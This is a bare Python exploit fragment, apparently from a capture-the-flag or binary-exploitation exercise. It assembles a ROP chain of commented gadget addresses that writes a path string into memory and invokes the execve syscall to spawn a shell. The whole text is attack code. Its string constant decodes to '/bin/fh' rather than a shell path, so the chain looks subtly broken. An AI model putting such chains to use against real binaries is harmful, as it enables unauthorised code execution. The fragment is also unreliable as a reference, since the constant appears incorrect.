payload = p64(0x40aea9)
#0x000000000040aea9: pop rbx; ret; 
payload += p64(0x44d068)+p64(0x42d7c4)
# 0x000000000042d7c4: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4240f5)
# 0x00000000004240f5: mov qword ptr [rbx + 8], rax; pop rbx; ret; 
payload += p64(0x0)+p64(0x42d7c4)
# 0x000000000042d7c4: pop rax; ret; 
payload += p64(0x3b)+p64(0x40d925)
# 0x000000000040d925: pop rsi; ret; 
payload += p64(0x0)+p64(0x4493c6)
# 0x00000000004493c6: pop rdx; fcmovne st(0), st(1); ret; 
payload += p64(0x0)+p64(0x431473)
# 0x0000000000431473: pop rdi; add rsp, 0x18; pop rbx; pop rbp; ret; 
payload += p64(0x44d070)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x44973f)
# 0x000000000044973f: syscall; 
payload += b''
